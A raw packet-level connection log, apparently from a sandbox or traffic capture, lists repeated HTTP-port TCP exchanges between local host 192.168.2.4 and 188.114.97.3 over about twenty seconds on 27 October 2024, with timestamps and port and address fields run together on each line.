                                                                                                                  Oct 27, 2024 19:23:09.976067066 CET8049830188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:09.976087093 CET4981880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.976130962 CET4983080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.976233006 CET4983080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.976733923 CET8049824188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:09.976800919 CET4982480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:09.981612921 CET8049830188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:10.323093891 CET4983080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:10.328440905 CET8049830188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:10.587162018 CET8049830188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:10.758500099 CET4983080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:10.895071030 CET8049830188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:10.895195961 CET8049830188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:10.895247936 CET4983080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:11.020088911 CET4983080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:11.020684958 CET4983680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:11.025939941 CET8049830188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:11.025993109 CET4983080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:11.026010036 CET8049836188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:11.026083946 CET4983680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:11.026158094 CET4983680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:11.032080889 CET8049836188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:11.383944035 CET4983680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:11.389717102 CET8049836188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:11.624330997 CET8049836188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:11.680449963 CET4983680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:11.921108007 CET8049836188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:11.961646080 CET4983680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:12.038101912 CET4983680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:12.038857937 CET4984280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:12.045470953 CET8049836188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:12.045654058 CET8049842188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:12.045711040 CET4983680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:12.045746088 CET4984280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:12.045836926 CET4984280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:12.051071882 CET8049842188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:12.399913073 CET4984280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:12.405309916 CET8049842188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:12.657399893 CET8049842188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:12.867902040 CET4984280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:12.973592043 CET8049842188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:13.055387974 CET4984280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:13.107278109 CET4984280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:13.111290932 CET4984880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:13.113008022 CET8049842188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:13.113081932 CET4984280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:13.116816044 CET8049848188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:13.117899895 CET4984880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:13.119216919 CET4984880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:13.124486923 CET8049848188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:13.591770887 CET4984880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:13.597248077 CET8049848188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:13.713222027 CET8049848188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:13.758531094 CET4984880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:13.930025101 CET8049848188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:13.930042028 CET8049848188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:13.930095911 CET4984880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:14.051055908 CET4984880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:14.051626921 CET4985480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:14.056883097 CET8049848188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:14.056965113 CET4984880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:14.057073116 CET8049854188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:14.057142019 CET4985480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:14.058545113 CET4985480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:14.063833952 CET8049854188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:14.414833069 CET4985480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:14.454359055 CET4986080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:14.727269888 CET4985480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:14.772861958 CET8049854188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:14.773559093 CET8049854188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:14.773575068 CET8049860188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:14.773617029 CET8049854188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:14.773644924 CET4986080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:14.773761034 CET4986080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:14.779179096 CET8049860188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:14.821033955 CET4985480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:15.075289965 CET8049854188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:15.075309038 CET8049854188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:15.075366974 CET4985480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:15.126722097 CET4986080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:15.132304907 CET8049860188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:15.132329941 CET8049860188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:15.192696095 CET4985480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:15.193259954 CET4986680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:15.198673964 CET8049866188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:15.199295998 CET8049854188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:15.199394941 CET4985480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:15.199466944 CET4986680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:15.199466944 CET4986680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:15.204765081 CET8049866188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:15.362649918 CET8049860188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:15.414866924 CET4986080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:15.555471897 CET4986680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:15.561480045 CET8049866188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:15.561651945 CET8049860188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:15.561666012 CET8049860188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:15.561743021 CET4986080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:15.811698914 CET8049866188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:15.852257967 CET4986680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:16.031846046 CET8049866188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:16.086657047 CET4986680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:16.426455975 CET4986080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:16.426503897 CET4986680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:16.427243948 CET4987280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:16.432169914 CET8049860188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:16.432265997 CET4986080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:16.432574987 CET8049872188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:16.432637930 CET4987280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:16.432652950 CET8049866188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:16.432698011 CET4986680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:16.433196068 CET4987280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:16.439533949 CET8049872188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:16.789941072 CET4987280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:16.795483112 CET8049872188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:17.037880898 CET8049872188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:17.086638927 CET4987280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:17.263052940 CET8049872188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:17.305402994 CET4987280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:17.391139030 CET4987280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:17.392282963 CET4987880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:17.396989107 CET8049872188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:17.397043943 CET4987280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:17.398390055 CET8049878188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:17.398466110 CET4987880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:17.398598909 CET4987880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:17.403858900 CET8049878188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:17.742999077 CET4987880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:17.748434067 CET8049878188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:17.987400055 CET8049878188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:18.039762020 CET4987880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:18.338105917 CET8049878188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:18.384738922 CET4987880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:18.469032049 CET4987880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:18.470107079 CET4988480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:18.475224018 CET8049878188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:18.475279093 CET4987880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:18.475522995 CET8049884188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:18.475589037 CET4988480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:18.475924969 CET4988480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:18.481211901 CET8049884188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:18.823627949 CET4988480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:18.829046965 CET8049884188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:19.080559969 CET8049884188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:19.164758921 CET4988480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:19.385049105 CET8049884188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:19.385067940 CET8049884188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:19.385116100 CET4988480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:19.503339052 CET4988480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:19.503962994 CET4989080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:19.509051085 CET8049884188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:19.509116888 CET4988480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:19.509319067 CET8049890188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:19.509397030 CET4989080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:19.509474039 CET4989080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:19.514760971 CET8049890188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:19.868072987 CET4989080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:19.873567104 CET8049890188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:20.104995966 CET8049890188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:20.164753914 CET4989080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.414608955 CET8049890188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:20.461659908 CET4989080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.594449043 CET4989080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.599490881 CET4989680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.602256060 CET8049890188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:20.602334976 CET4989080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.606863976 CET8049896188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:20.606944084 CET4989680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.608278990 CET4989680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.615586042 CET8049896188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:20.631827116 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.639164925 CET8049897188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:20.639219999 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.659945011 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:20.667201042 CET8049897188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:20.963224888 CET4989680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.009491920 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.036864042 CET8049896188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.036992073 CET8049896188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.037295103 CET8049897188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.232511044 CET8049896188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.240716934 CET8049897188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.289783001 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.357896090 CET4989680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.472637892 CET8049897188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.524133921 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.539321899 CET8049896188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.600328922 CET4989680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.600387096 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.601052046 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.606259108 CET8049896188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.606329918 CET4989680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.606597900 CET8049897188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.606769085 CET4989780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.606950998 CET8049903188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.607038021 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.607111931 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.612428904 CET8049903188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:21.962794065 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:21.968235016 CET8049903188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:22.226033926 CET8049903188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:22.274266005 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:22.528465986 CET8049903188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:22.571059942 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:22.647942066 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:22.648524046 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:22.656063080 CET8049909188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:22.656423092 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:22.656532049 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:22.656816006 CET8049903188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:22.656877995 CET4990380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:22.663887024 CET8049909188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:23.023518085 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.028933048 CET8049909188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:23.260824919 CET8049909188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:23.305416107 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.475785971 CET8049909188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:23.524144888 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.608891010 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.612884045 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.614873886 CET8049909188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:23.614955902 CET4990980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.618180037 CET8049915188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:23.618253946 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.620448112 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.626663923 CET8049915188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:23.977475882 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:23.982948065 CET8049915188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:24.221551895 CET8049915188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:24.274137974 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:24.533438921 CET8049915188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:24.533529997 CET8049915188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:24.533579111 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:24.667953968 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:24.669168949 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:24.673712015 CET8049915188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:24.673770905 CET4991580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:24.674474955 CET8049921188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:24.674673080 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:24.674752951 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:24.679970026 CET8049921188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:25.024260998 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.029685974 CET8049921188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:25.284326077 CET8049921188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:25.367903948 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.595818996 CET8049921188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:25.664773941 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.729916096 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.730463028 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.735511065 CET8049921188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:25.735564947 CET4992180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.735815048 CET8049931188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:25.735878944 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.736021996 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:25.741349936 CET8049931188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:26.086759090 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:26.092184067 CET8049931188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:26.350963116 CET8049931188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:26.399164915 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:26.545418978 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:26.550741911 CET8049936188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:26.550806999 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:26.551053047 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:26.556358099 CET8049936188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:26.677417994 CET8049931188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:26.727272034 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:26.982070923 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:26.987431049 CET8049936188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:26.987550974 CET8049936188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.147943020 CET8049936188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.176400900 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.177023888 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.182163000 CET8049931188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.182719946 CET8049939188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.182780981 CET4993180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.182805061 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.183696985 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.188993931 CET8049939188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.355957031 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.454665899 CET8049936188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.539858103 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.545217991 CET8049939188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.658334017 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:27.785991907 CET8049939188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:27.961667061 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.388420105 CET8049939188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:28.389286995 CET8049939188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:28.389337063 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.687622070 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.687675953 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.688231945 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.755903006 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:28.755913973 CET8049936188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:28.755995035 CET4993680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.756009102 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.756151915 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.756488085 CET8049939188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:28.757179022 CET4993980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:28.761543036 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.102458954 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.107873917 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.360512972 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.414916992 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.762352943 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.762517929 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.762562990 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.762656927 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.762726068 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.891168118 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.893774986 CET4995480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.896843910 CET8049948188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:29.896893978 CET4994880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.899120092 CET8049954188.114.97.3192.168.2.4
